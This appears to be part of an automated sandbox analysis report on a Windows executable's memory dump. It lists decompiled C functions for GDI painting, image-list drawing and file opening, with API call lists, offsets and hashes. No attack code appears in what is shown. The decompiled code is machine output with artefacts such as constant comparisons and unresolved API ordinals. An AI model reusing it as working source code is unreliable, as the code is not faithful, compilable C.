                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CD8
                                                                        • 72E7B410.GDI32(?,?,000000FF), ref: 00424606
                                                                        • 72E7B150.GDI32(?,?,?,000000FF), ref: 00424615
                                                                        • 72E7AD70.GDI32(?,0000000C), ref: 00424627
                                                                        • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00424636
                                                                        • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042466A
                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00424678
                                                                        • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424690
                                                                        • 72E7A590.GDI32(00000000,00000000,00424796,?,?,0000000E,00000000,?,0000000C), ref: 0042470D
                                                                        • SelectObject.GDI32(?,?), ref: 00424722
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Brush$A590B150B380B410CreateHalftoneModeObjectPaletteSelectStretch
                                                                        • String ID:
                                                                        • API String ID: 1694230195-0
                                                                        • Opcode ID: c6f4b90d25e3a7f91d213dfbbab5338d454019bf6aa3b904367bac129662575e
                                                                        • Instruction ID: 8a5360052a613d484358f7dafbb41ff6efc4df6e6b80e8dfa515692f2bc59ea2
                                                                        • Opcode Fuzzy Hash: c6f4b90d25e3a7f91d213dfbbab5338d454019bf6aa3b904367bac129662575e
                                                                        • Instruction Fuzzy Hash: 37516CB5B00215AFCB10EFA9D885F5ABBF8EB49304F51846AF508E7381D638ED00CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043AE5C, Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E0043AE5C(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00439AB4(_t83) != 0) {
						_t38 = E0043A97C(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L00406EB4();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L00406ADC();
					_v12 = _t47;
					L00407124();
					L00406AE4();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E0043CC2C(_t83),  &_v80);
					E00437760(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E0043AE5C(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43afae, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00406ABC();
					EndPaint(E0043CC2C(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x43afb5);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                                                        0x0043ae5d
                                                                        0x0043ae5f
                                                                        0x0043ae64
                                                                        0x0043ae65
                                                                        0x0043ae67
                                                                        0x0043ae70
                                                                        0x0043ae7c
                                                                        0x0043ae9b
                                                                        0x0043ae89
                                                                        0x0043ae8f
                                                                        0x0043ae8f
                                                                        0x0043afbb
                                                                        0x0043aea5
                                                                        0x0043aea7
                                                                        0x0043aeb5
                                                                        0x0043aec3
                                                                        0x0043aec6
                                                                        0x0043aecb
                                                                        0x0043aed0
                                                                        0x0043aed6
                                                                        0x0043aedd
                                                                        0x0043aee2
                                                                        0x0043aef2
                                                                        0x0043af00
                                                                        0x0043af0f
                                                                        0x0043af24
                                                                        0x0043af2c
                                                                        0x0043af33
                                                                        0x0043af3a
                                                                        0x0043af51
                                                                        0x0043af5f
                                                                        0x0043af65
                                                                        0x0043af66
                                                                        0x0043af68
                                                                        0x0043af6b
                                                                        0x0043af7c
                                                                        0x0043af83
                                                                        0x0043af86
                                                                        0x0043af89
                                                                        0x0043af96
                                                                        0x0043af9f
                                                                        0x0043afad
                                                                        0x0043afad

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 0043AEA7
                                                                        • 72E7A520.GDI32(00000000,?), ref: 0043AECB
                                                                        • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 0043AED6
                                                                        • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 0043AEDD
                                                                        • SelectObject.GDI32(00000000,?), ref: 0043AEED
                                                                        • BeginPaint.USER32(00000000,?,00000000,0043AFAE,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF0F
                                                                        • 72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF6B
                                                                        • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF7C
                                                                        • SelectObject.GDI32(00000000,?), ref: 0043AF96
                                                                        • DeleteDC.GDI32(00000000), ref: 0043AF9F
                                                                        • DeleteObject.GDI32(?), ref: 0043AFA8
                                                                          • Part of subcall function 0043A97C: BeginPaint.USER32(00000000,?), ref: 0043A9A2
                                                                          • Part of subcall function 0043A97C: EndPaint.USER32(00000000,?,0043AAA3), ref: 0043AA96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                                                        • String ID:
                                                                        • API String ID: 3782911080-0
                                                                        • Opcode ID: d13974afed72c26d1f8b7f13268e4a6461a7d17cbdf11dd2431701b7f6cf42ad
                                                                        • Instruction ID: 6c27e87496bbd68a0565411df090fbb30ca26b63d5b2c97abbe2d0871e1eec49
                                                                        • Opcode Fuzzy Hash: d13974afed72c26d1f8b7f13268e4a6461a7d17cbdf11dd2431701b7f6cf42ad
                                                                        • Instruction Fuzzy Hash: 11416A71B40204AFDB00EBA9CC85B9EB7F9EB4C704F10447AB50AEB281DA79AD15CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00443D4C, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 39%
                                                                        			E00443D4C(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E00443514(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E004242CC(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E004256E4(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E0041FC50( *((intOrPtr*)(E00424894( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00412BCC( *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E00424894( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E004202E8(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420730(E00424894( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E004436E8(_t118));
						L00426AE8();
						E00412BCC(_a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00420730(E00424894( *((intOrPtr*)(_t118 + 0x54))));
						E0041FC50( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000014, _t135, _t139, __eflags);
						_t136 = E00420730(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00406ABC();
						E0041FC50( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000010, _t135, _t139, _t85);
						_t137 = E00420730(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00406ABC();
						return _t96;
					}
					_push(_a8);
					_push(E00443310(_t142));
					E00443D24(_t118, _t142);
					_push(E00443310(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00420730(__ecx));
					_push(_v8);
					_t117 = E004436E8(_t118);
					_push(_t117);
					L00426AE8();
					return _t117;
				}
				return _t46;
			}




















                                                                        0x00443d4c
                                                                        0x00443d55
                                                                        0x00443d57
                                                                        0x00443d5a
                                                                        0x00443d5e
                                                                        0x00443d65
                                                                        0x00443d6b
                                                                        0x00443d6f
                                                                        0x00443db5
                                                                        0x00443db9
                                                                        0x00443dc7
                                                                        0x00443dc9
                                                                        0x00443dd0
                                                                        0x00443ddc
                                                                        0x00443de4
                                                                        0x00443de6
                                                                        0x00443de6
                                                                        0x00443df9
                                                                        0x00443e0d
                                                                        0x00443e15
                                                                        0x00443e19
                                                                        0x00443e1e
                                                                        0x00443e1f
                                                                        0x00443e24
                                                                        0x00443e26
                                                                        0x00443e28
                                                                        0x00443e2a
                                                                        0x00443e2c
                                                                        0x00443e2e
                                                                        0x00443e30
                                                                        0x00443e3f
                                                                        0x00443e43
                                                                        0x00443e4b
                                                                        0x00443e4c
                                                                        0x00443e68
                                                                        0x00443e7a
                                                                        0x00443e85
                                                                        0x00443e91
                                                                        0x00443e99
                                                                        0x00443ea1
                                                                        0x00443ea6
                                                                        0x00443eab
                                                                        0x00443ead
                                                                        0x00443eb2
                                                                        0x00443eb6
                                                                        0x00443eba
                                                                        0x00443ebf
                                                                        0x00443ec3
                                                                        0x00443ec3
                                                                        0x00443ec4
                                                                        0x00443ec5
                                                                        0x00443ec6
                                                                        0x00443ed3
                                                                        0x00443edf
                                                                        0x00443ee7
                                                                        0x00443eef
                                                                        0x00443ef4
                                                                        0x00443ef9
                                                                        0x00443efb
                                                                        0x00443f00
                                                                        0x00443f04
                                                                        0x00443f08
                                                                        0x00443f0c
                                                                        0x00443f0d
                                                                        0x00443f10
                                                                        0x00443f11
                                                                        0x00443f12
                                                                        0x00000000
                                                                        0x00443f12
                                                                        0x00443d74
                                                                        0x00443d7d
                                                                        0x00443d80
                                                                        0x00443d8a
                                                                        0x00443d8b
                                                                        0x00443d8d
                                                                        0x00443d92
                                                                        0x00443d96
                                                                        0x00443d9e
                                                                        0x00443da2
                                                                        0x00443da5
                                                                        0x00443daa
                                                                        0x00443dab
                                                                        0x00000000
                                                                        0x00443dab
                                                                        0x00443f1d

                                                                        APIs
                                                                        • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00443DAB
                                                                        • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00443E4C
                                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00443E99
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00443EA1
                                                                        • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00443EC6
                                                                          • Part of subcall function 00443D24: 73452240.COMCTL32(00000000,?,00443D85,00000000,?), ref: 00443D3A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 73452430Color$73452240E897Text
                                                                        • String ID: DA
                                                                        • API String ID: 3108427945-2080325668
                                                                        • Opcode ID: c2254ac722dfa3df87788b38a6e7611e15f13b677d4a539b87433d063c409f02
                                                                        • Instruction ID: b45212fec9e8cfc054dcf64ae06490e4be8bfbe9f25bbab4dce699ee82f4dead
                                                                        • Opcode Fuzzy Hash: c2254ac722dfa3df87788b38a6e7611e15f13b677d4a539b87433d063c409f02
                                                                        • Instruction Fuzzy Hash: C6514F71700115AFDB40EF69DD82F9E37ECAF48714F50016AB904EB382CA78ED558B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043AAD8, Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043AAD8(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E00414208( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041EFA4(0x80000010));
							E00412BCC( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041EFA4(0x80000014));
							E00412BCC( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00414264(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E00414208( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00412BCC( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E00434EE8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E00437760(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                                                        0x0043aadc
                                                                        0x0043aadf
                                                                        0x0043aae1
                                                                        0x0043aae3
                                                                        0x0043aaec
                                                                        0x0043ab0a
                                                                        0x0043ab0a
                                                                        0x0043ab0d
                                                                        0x0043ab15
                                                                        0x0043abfa
                                                                        0x0043abfa
                                                                        0x0043ac02
                                                                        0x0043ad07
                                                                        0x0043ad07
                                                                        0x0043ad07
                                                                        0x0043ac0b
                                                                        0x0043ac0e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0043ac15
                                                                        0x0043ac19
                                                                        0x0043ac1b
                                                                        0x0043ac23
                                                                        0x0043ac28
                                                                        0x0043ac31
                                                                        0x0043ac6b
                                                                        0x0043ac8e
                                                                        0x0043ac99
                                                                        0x0043aca3
                                                                        0x0043acb8
                                                                        0x0043acdb
                                                                        0x0043ace6
                                                                        0x0043acf0
                                                                        0x0043acf0
                                                                        0x0043acf5
                                                                        0x0043acf6
                                                                        0x0043acf6
                                                                        0x0043acf6
                                                                        0x00000000
                                                                        0x0043ac1b
                                                                        0x0043ab1b
                                                                        0x0043ab1f
                                                                        0x0043ab28
                                                                        0x0043ab2c
                                                                        0x0043ab2e
                                                                        0x0043ab2e
                                                                        0x0043ab2c
                                                                        0x0043ab39
                                                                        0x0043ab3f
                                                                        0x0043ab45
                                                                        0x0043ab52
                                                                        0x0043ab58
                                                                        0x0043ab86
                                                                        0x0043ab98
                                                                        0x0043ab9e
                                                                        0x0043aba0
                                                                        0x0043aba0
                                                                        0x0043abac
                                                                        0x0043abb8
                                                                        0x0043abca
                                                                        0x0043abda
                                                                        0x0043abe5
                                                                        0x0043abea
                                                                        0x0043abea
                                                                        0x0043ab98
                                                                        0x0043abf0
                                                                        0x0043abf1
                                                                        0x0043ab45

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                        • String ID:
                                                                        • API String ID: 375863564-0
                                                                        • Opcode ID: a339bbe9dbde8620f25859f2c879bc2d89aaec14b1b7b84054d5a770207a83ca
                                                                        • Instruction ID: 0b65945d901311baf0f71d7817378dc12ba5f118a77a7d6de250862080b77c6d
                                                                        • Opcode Fuzzy Hash: a339bbe9dbde8620f25859f2c879bc2d89aaec14b1b7b84054d5a770207a83ca
                                                                        • Instruction Fuzzy Hash: A4516F712042449FD714DF29C8C4B5B77E9AF88308F04445EFE86CB296D639E891CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402B40, Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E00402B40(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a94;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402AD4;
				}
				_t59[9] = E00402B20;
				_t59[8] = E00402AD0;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402AD0;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x4963e4) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402AD4;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                        0x00402b41
                                                                        0x00402b45
                                                                        0x00402b48
                                                                        0x00402b54
                                                                        0x00402b61
                                                                        0x00402b66
                                                                        0x00402b6b
                                                                        0x00402b70
                                                                        0x00402b56
                                                                        0x00402b57
                                                                        0x00402b79
                                                                        0x00402b7e
                                                                        0x00402b83
                                                                        0x00402b59
                                                                        0x00402b5a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402b8a
                                                                        0x00402b8f
                                                                        0x00402b94
                                                                        0x00402b94
                                                                        0x00402b99
                                                                        0x00402b99
                                                                        0x00402ba0
                                                                        0x00402ba7
                                                                        0x00402bb2
                                                                        0x00402c70
                                                                        0x00402c77
                                                                        0x00402c7e
                                                                        0x00402c87
                                                                        0x00402c93
                                                                        0x00402c99
                                                                        0x00402c95
                                                                        0x00402c95
                                                                        0x00402c95
                                                                        0x00402c89
                                                                        0x00402c89
                                                                        0x00402c89
                                                                        0x00402c9b
                                                                        0x00402ca3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402ca5
                                                                        0x00000000
                                                                        0x00402bb8
                                                                        0x00402bc8
                                                                        0x00402bd0
                                                                        0x00402cde
                                                                        0x00402cde
                                                                        0x00000000
                                                                        0x00402ce4
                                                                        0x00402bd6
                                                                        0x00402bde
                                                                        0x00402ca7
                                                                        0x00402cad
                                                                        0x00402cc6
                                                                        0x00000000
                                                                        0x00402cc6
                                                                        0x00402cb1
                                                                        0x00402cb8
                                                                        0x00402ccc
                                                                        0x00402cd1
                                                                        0x00000000
                                                                        0x00402cd7
                                                                        0x00402cbd
                                                                        0x00402cbf
                                                                        0x00402cbf
                                                                        0x00000000
                                                                        0x00402cbd
                                                                        0x00402be4
                                                                        0x00402bf1
                                                                        0x00402bf2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402bf8
                                                                        0x00402bfd
                                                                        0x00402bff
                                                                        0x00402bff
                                                                        0x00402c0e
                                                                        0x00000000
                                                                        0x00402c14
                                                                        0x00402c29
                                                                        0x00402c2e
                                                                        0x00402c30
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402c36
                                                                        0x00402c38
                                                                        0x00402c44
                                                                        0x00402c58
                                                                        0x00000000
                                                                        0x00402c68
                                                                        0x00000000
                                                                        0x00402c68
                                                                        0x00402c58
                                                                        0x00402c46
                                                                        0x00402c46
                                                                        0x00000000
                                                                        0x00402c38
                                                                        0x00402c0e

                                                                        APIs
                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC8
                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BEC
                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402C08
                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C29
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C52
                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C60
                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00402C9B
